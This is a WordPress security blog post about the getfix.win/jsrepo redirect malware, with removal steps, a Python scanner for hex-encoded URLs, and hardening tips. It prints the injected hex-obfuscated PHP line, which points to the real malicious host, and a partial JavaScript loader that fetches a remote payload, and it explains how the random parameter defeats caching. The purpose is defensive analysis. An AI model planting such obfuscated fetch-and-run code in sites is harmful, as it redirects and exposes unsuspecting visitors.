Website Redirecting to getfix[.]win: How to Detect, Remove, and Prevent This Malware

Quick Answer: What is the Getfix.win Hack?

The getfix.win/jsrepo malware is a JavaScript injection that redirects your visitors to spam sites. It hides in your theme’s functions.php file using “Hex Encoding” to look like random numbers.

How to Remove It:

  1. Locate: Open functions.php and look for a line starting with $url = "\x68\x74...".
  2. Delete: Remove that specific line of code.
  3. Scan: Run a Wordfence scan to find any other hidden backdoors.
  4. Update: Update all plugins immediately, as this hack usually enters via outdated software.

If your website keeps redirecting to hxxps://getfix.win/jsrepo, it has been hit by a specific type of WordPress malware. This hack is currently targeting thousands of sites, messing up SEO, and scaring away visitors.

I recently worked on a client’s site and found this exact malware hiding in their theme’s functions.php file. In this guide, I will show you exactly what this code looks like, how to decode it, and how to clean it up permanently.


What Is the Getfix.win Redirect Malware?

The getfix.win/jsrepo redirect hack sneaks code into your WordPress files. It makes visitors’ browsers fetch a malicious script from getfix.win, which then redirects them to junk sites, gambling ads, or tech support scams.

The Sneaky Part: This malware often targets visitors, not admins. If you are logged in as an Administrator, you might not see the redirect at all. This tricks you into thinking your site is fine while your customers are being sent to spam sites.


Breaking Down the Malicious Code (Developer Analysis)

The malware uses clever tricks to hide itself. I decoded the exact script I found on my client’s site so you know what to look for.

1. The PHP Injection (functions.php)

In the functions.php file (see screenshot below), the hacker injects a line of code that looks like this:

$url = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x65\x74\x66\x69\x78\x2e\x77\x69\x6e\x2f\x6a\x73\x72\x65\x70\x6f?rnd=" . time() . '_' . rand(1000, 9999);

[Screenshot: obfuscated PHP code injected into a WordPress functions.php file, causing the getfix.win redirect]

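This is called Hex Encoding. The hacker writes each character of the text as a hexadecimal escape sequence (e.g., \x68 = h), which PHP turns back into normal text when the code runs, so security scanners that search the file for the word “getfix.win” don’t find it.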

Decoded, that line actually says:

$url = "https://getfix.win/jsrepo?rnd=[Time]_[RandomNumber]";

Why the random numbers?
The code appends a value such as ?rnd=1730700000_1234 to the end of the URL. Because every request URL is unique, this trick forces the browser to download a fresh copy of the virus every time, bypassing any caching plugins or firewalls you might have.

2. The JavaScript Injection

Once the PHP code runs, it injects a JavaScript snippet into your site’s header:

<script>
;!function t(){var e="https://getfix.win/jsrepo?rnd="+Math.random()+"&ts="+Date.now();
// ... code that fetches the virus ...
</script>

This script connects to the hacker’s server and downloads the actual “Payload”—the code that redirects your users.


How to Remove the Malware (Step-by-Step)

Removing this specific infection is straightforward if you follow these steps carefully.

Step 1: Check your functions.php file

  1. Log into your hosting via FTP or File Manager.
  2. Navigate to wp-content/themes/your-active-theme/.
  3. Open the functions.php file.
  4. Look for the code starting with $url = "\x68... or similar hex characters.
  5. Delete that entire code block.

Note: Sometimes this code is also hidden in header.php or footer.php. Check those too.
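
The check in Step 1 can be automated. The following is an added example, not code from the infected site or from any scanner named in this post: a small Python script that goes a little beyond the single line shown above by decoding every run of \xNN escapes in every .php file under a directory and reporting the ones that decode to a URL. The function names, the four-escape threshold, and the sample text are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# Four or more consecutive \xNN escapes as written in PHP source.
# The threshold of four is an assumption of this example, chosen to skip short escapes.
HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){4,}')
# Decoded text worth a human look: a URL scheme or a protocol-relative host.
URL_HINT = re.compile(r'https?://|^//', re.IGNORECASE)

# Constructed sample: the injected line quoted in this post plus a harmless hex string.
SAMPLE = r'''<?php
$url = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x65\x74\x66\x69\x78\x2e\x77\x69\x6e\x2f\x6a\x73\x72\x65\x70\x6f?rnd=" . time() . '_' . rand(1000, 9999);
$color = "\x23\x66\x66\x66\x66";
'''

def decode_hex_run(run):
    """Turn a literal \\xNN run into the text PHP would produce at runtime."""
    raw = bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', run))
    return raw.decode('latin-1')  # one byte maps to one character, never fails

def scan_text(text):
    """Return (line_number, decoded_string) for every hex run that hides a URL."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in HEX_RUN.finditer(line):
            decoded = decode_hex_run(match.group(0))
            if URL_HINT.search(decoded):
                hits.append((lineno, decoded))
    return hits

def scan_tree(root):
    """Scan every .php file under root; returns {path: [(line, decoded), ...]}."""
    report = {}
    for path in sorted(Path(root).rglob('*.php')):
        hits = scan_text(path.read_text(encoding='utf-8', errors='replace'))
        if hits:
            report[str(path)] = hits
    return report

if __name__ == '__main__':
    # With a directory argument, scan it; without one, scan the constructed sample.
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            for lineno, decoded in hits:
                print(f'{path}:{lineno}: hex-encoded URL -> {decoded}')
    else:
        print(scan_text(SAMPLE))
```

Run it against wp-content/themes/ (or the whole wp-content folder) on a downloaded copy of the site; a hit is a lead to inspect by hand, since legitimate code occasionally hex-encodes strings too.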

Step 2: Run a Deep Scan

Deleting the line stops the redirect, but you need to find the “Backdoor” the hacker used to get in. Install Wordfence or MalCare and run a full scan to find hidden files.

Step 3: Update Everything

This specific malware usually spreads through outdated plugins or “nulled” (pirated) themes. Update all your plugins immediately. If you are using a nulled theme, delete it—it is the source of the infection.


Prevention: How to Stop It From Coming Back

Once you are clean, lock the door:

  • Change Passwords: Change your WP Admin, FTP, and Database passwords immediately.
  • Disable File Editing: Add define('DISALLOW_FILE_EDIT', true); to your wp-config.php file. This stops hackers from editing your functions.php file from the dashboard.
  • Install a Firewall: Use the free version of Wordfence or Cloudflare to block bad bots.

Need Help?

If you are uncomfortable editing PHP files or if the redirect keeps coming back after you delete it, you might have a deeper infection (like a hidden database backdoor).

I offer a professional WordPress Malware Removal Service. I will manually clean your files, remove the backdoors, and secure your site against future attacks.
